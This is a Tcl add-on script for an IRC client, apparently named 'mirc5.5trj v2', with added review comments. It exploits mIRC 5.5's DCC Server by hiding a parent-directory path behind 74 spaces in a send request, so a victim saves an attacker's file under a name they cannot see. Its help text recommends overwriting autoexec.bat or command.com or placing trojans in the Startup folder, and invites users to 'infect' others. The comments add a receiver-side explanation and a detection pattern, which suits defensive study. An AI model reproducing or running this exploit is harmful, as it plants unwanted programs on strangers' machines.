#120 my_nick filesize fakefilename(74 spaces)\..\..\..\..\..\fullfakepathname
#
# The line above is the request format this script writes to the peer's DCC
# Server port (see put_55): code 120, sender nick, file size, then a single
# filename field made of a display name, 74 spaces of padding and a relative
# path that climbs five directory levels before naming the real destination.
#
# Defensive reading: the weakness is on the receiving side. According to the
# script's own help text, the receiver shows only the leading display name
# and then saves the data under the full field. A receiver that reduces the
# name to its final path component, refuses names containing path separators
# or parent-directory components, and shows the user the whole name is not
# exposed to this. For detection, a code-120 request whose filename field
# holds a long run of spaces or a ..\ sequence matches the pattern built below.
#
# NOTE(review): args, uhost, rep, t, kano, event, echo, complete, kaddhelp,
# addname and addecho are not defined here; presumably they come from the
# host IRC client or the surrounding script package. Confirm before relying
# on any description of them.
# NOTE(review): the usage and help strings appear to have lost their
# placeholder fields during extraction; they are reproduced as found.

# /mirc5 alias: parses the arguments, checks the local file exists, resolves
# the target host and opens a TCP connection whose events are handled by
# put_55 (writable) and get_55 (readable).
alias mirc5 {
  complete
  # Positional arguments: target nick or host, port, nick to present as the
  # sender, local file to send, display filename, and the rest joined as the
  # destination path.
  set tonick [lindex [args] 0]
  set port [lindex [args] 1]
  set denick [lindex [args] 2]
  set file [rep [lindex [args] 3] / \\]
  set fakefile [lindex [args] 4]
  # Leading and trailing slashes and backslashes are trimmed from the path.
  set fakepath [string trim [join [lrange [args] 5 end]] \\/]
  # An empty destination path means too few arguments: print usage and stop.
  if {$fakepath == ""} {
    echo "[kano] Usage: /[event] 4 7 8 9 11 13"
    echo "[kano] Example: /[event]4 12.153.0.11 0759 8kano_owns_you 9kano11.zip 11hot.gif 13windows/start menu/programs/startup/kickass.zip"
    echo "[kano] What to overwrite? Try autoexec.bat, windows/start menu/programs/startup/file.ext (stick trojans in here), windows/command.com"
    echo "[kano] What this does: it connects to mirc 5.5's DCC Server port"
    echo " and requests to send a file: "
    echo " but it actually sends a completely different filename: which they can't see. It saves that"
    echo " file on their hard drive and if you put it in their startup"
    echo " dir it runs on startup."
    return
  }
  if ![file exists $file] {
    echo "[kano] $file does not exist"
    return
  }
  # Resolve the target: when uhost returns nothing the argument is used as
  # the host directly, otherwise the part after the last @ is used.
  set host [uhost $tonick]
  if {$host == ""} {set host $tonick} {set host [lindex [split $host @] end]}
  # On a successful connect the socket is made binary and non-blocking and
  # the two event handlers are registered; on failure x holds the error text.
  if ![catch {socket $host $port} x] {
    fconfigure $x -translation binary -blocking no
    fileevent $x writable [list put_55 $x $tonick $denick $file $fakefile $fakepath]
    fileevent $x readable [list get_55 $x $tonick $file]
  } {
    echo [rep [rep [t socketfailed] %error $x] %type "mirc 5.5 trojan"]
  }
  complete
}

# Writable-event handler: runs once when the connection is ready and sends
# the single request line, then restores binary non-blocking mode.
#   sock     - connected socket
#   to       - target name, used only in the status message
#   from     - nick placed in the request as the sender
#   file     - local file; only its size is read here
#   fakefile - name whose tail forms the leading part of the filename field
#   fake     - destination path appended after the padding
proc put_55 {sock to from file fakefile fake} {
  # Clear the handler so the request is sent only once.
  fileevent $sock writable ""
  echo "[kano] Sent mirc5 send request to $to"
  fconfigure $sock -buffering line
  # Filename field: display name, 74 spaces, then five parent-directory
  # steps joined to the destination path, with / rewritten to backslashes.
  puts $sock "120 $from [file size $file] [file tail $fakefile][format %74s ""][rep [file join ../../../../.. $fake] / \\]"
  fconfigure $sock -translation binary -blocking no
}

# Readable-event handler: reads one reply line from the peer and acts on its
# first field. The meanings given for 150, 151 and 121 are the ones stated
# by the script's own messages.
#   sock - connected socket
#   to   - target name expected in the reply
#   file - local file to transmit
proc get_55 {sock to file} {
  if [eof $sock] {
    echo "[kano] $to closed mirc5 dcc connection"
    close $sock
    return
  }
  # Read the reply in line mode, then switch back to binary for the payload.
  fconfigure $sock -buffering line
  gets $sock i
  fconfigure $sock -translation binary -blocking no
  set i [split $i]
  switch -- [lindex $i 0] {
    150 {
      # The peer does not accept sends through its DCC server.
      echo "[kano] $to has dcc sends via the dcc server unchecked, closing connection"
      close $sock
      return
    }
    151 {
      # The peer refused this request.
      echo "[kano] $to has rejected the dcc connection, closing"
      close $sock
      return
    }
    default {
      # Any code other than 121 is reported but processing continues.
      if {[lindex $i 0] != "121"} {
        echo "[kano] continuing, but got unknown response from $to: [join $i]"
      }
      # Field 2 is treated as a resume offset; a non-zero value aborts.
      if {[lindex $i 2] != 0} {
        echo "[kano] $to wants to resume $file at [lindex $i 2] bytes, closing connection (try a different filename)"
        close $sock
        return
      }
      # Field 1 is the nick the peer reports; a mismatch is only logged.
      if {$to != [lindex $i 1]} {
        echo "[kano] $to says they're [lindex $i 1], but still continuing"
      }
      if [catch {open $file} x] {
        echo "[kano] error opening file $file to send $to, aborting"
        close $sock
        return
      }
      fconfigure $x -translation binary -blocking no
      fileevent $sock readable ""
      # NOTE(review): unsupported0 looks like the Tcl 8.0 channel-copy
      # command that later became fcopy; here it is given the file channel
      # and the socket. Confirm against the interpreter in use.
      unsupported0 $x $sock
      echo "[kano] Finished sending $file to $to, closing connection"
      close $sock
    }
  }
}

# Registration with the surrounding script package: help entry, add-on name
# and a startup message.
kaddhelp mirc5 ";A mirc 5.5 trojan generator"
addname "mirc5.5trj v2"
addecho "[kano] type /mirc5 to infect some mirc 5.5'ers"